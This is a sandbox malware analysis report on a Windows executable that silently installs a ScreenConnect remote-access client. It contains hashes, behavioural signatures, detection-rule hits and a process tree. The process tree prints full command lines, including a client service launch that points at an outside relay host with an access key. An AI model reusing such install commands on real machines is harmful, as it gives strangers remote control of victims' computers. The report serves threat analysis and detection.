Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tiG6Ep202n.exe

Overview

General Information

Sample name:tiG6Ep202n.exe
renamed because original name is a hash value
Original sample name:58dff1cfcae1349d3e7cc009fb0cf1c109bdb4a5f3d2f8101ff9bd61d514a811.exe
Analysis ID:1567468
MD5:e7e869eca1d9e7fb0c7197725f3e22e5
SHA1:0443247608194aa371b80e0f398f7180436821bb
SHA256:58dff1cfcae1349d3e7cc009fb0cf1c109bdb4a5f3d2f8101ff9bd61d514a811
Tags:exescreen-connectprotocol-essigneduser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:44
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • tiG6Ep202n.exe (PID: 5500 cmdline: "C:\Users\user\Desktop\tiG6Ep202n.exe" MD5: E7E869ECA1D9E7FB0C7197725F3E22E5)
    • msiexec.exe (PID: 5012 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 6900 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3556 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 65BBBA74F7292B7FF205870D60C0A988 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 1588 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 6436 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3D471D2A52DB95060FC9B91DC9E4C61F MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2436 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BC39C5326F99970A8179C0B7FC0A805D E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 6880 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=16dcb7ee-2b94-4a51-a426-55c28e344f1f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=OLD-01" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 504 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "75df5a49-a7b2-4825-b91e-9f1189beb45e" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 672 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "9ece94ec-15d3-44dc-8c54-6fbc056de45a" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • svchost.exe (PID: 2144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
tiG6Ep202n.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DFA2315AC072D60478.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DF05F0D14B49496305.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Temp\~DFA01B11556604F6BD.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            C:\Windows\Temp\~DF5F6339E16C6791FF.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Click to see the 5 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000002.2173892307.0000000005A60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    00000000.00000002.2178858378.00000000068B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        Click to see the 5 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.2.tiG6Ep202n.exe.5a60000.12.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          9.2.ScreenConnect.WindowsClient.exe.2acfa18.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            9.0.ScreenConnect.WindowsClient.exe.7e0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              0.2.tiG6Ep202n.exe.5a60000.12.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                11.2.ScreenConnect.WindowsClient.exe.28bfa50.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                  Click to see the 4 entries

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (a532d472f1ff1d4e) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 6900, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-66E1-82EBBD1A2A17}\(Default)
                                  Sigma detected: Windows Processes Suspicious Parent Directory
                                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2144, ProcessName: svchost.exe

                                  Suricata Signatures

                                  No Suricata rule has matched

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Multi AV Scanner detection for submitted file
                                  Source: tiG6Ep202n.exeReversingLabs: Detection: 26%
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_0545155C CryptUnprotectData,8_2_0545155C
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_05451528 CryptUnprotectData,8_2_05451528
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_05452F88 CryptUnprotectData,8_2_05452F88
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeEXE: msiexec.exeJump to behavior

                                  Compliance

                                  barindex
                                  EXE planting / hijacking vulnerabilities found
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeEXE: msiexec.exeJump to behavior
                                  Uses 32bit PE files
                                  Source: tiG6Ep202n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  PE / OLE file has a valid certificate
                                  Source: tiG6Ep202n.exeStatic PE information: certificate valid
                                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                                  Source: tiG6Ep202n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Binary contains paths to debug symbols
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: tiG6Ep202n.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: tiG6Ep202n.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258312922.00000000026A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2257943532.0000000002620000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: tiG6Ep202n.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2194187109.0000000000B5D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: tiG6Ep202n.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2168361518.0000000004D40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: tiG6Ep202n.exe, MSI9C5F.tmp.3.dr, 6699ff.msi.3.dr, MSI9C7F.tmp.3.dr, 6699fe.rbs.3.dr, 6699fd.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSIA097.tmp.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: tiG6Ep202n.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: tiG6Ep202n.exe, 6699ff.msi.3.dr, 6699fd.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSI9606.tmp.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258066054.0000000002662000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258066054.0000000002662000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.4024496608.0000000002147000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: tiG6Ep202n.exe
                                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile opened: c:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                                  Networking

                                  barindex
                                  Enables network access during safeboot for specific services
                                  Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                                  Source: global trafficTCP traffic: 192.168.2.6:49710 -> 38.69.12.167:8041
                                  Source: Joe Sandbox ViewIP Address: 38.69.12.167 38.69.12.167
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: sc.connectprotocol.es
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: svchost.exe, 0000000A.00000002.3879697188.0000027B7C400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.2264300548.0000000012850000.00000004.00000800.00020000.00000000.sdmp, tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                  Source: qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: tiG6Ep202n.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: tiG6Ep202n.exe, 00000000.00000002.2150232291.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.4013580934.0000000001364000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                  Source: rundll32.exe, 00000005.00000003.2166340137.0000000004F83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166340137.0000000004F14000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166528725.0000000004D43000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
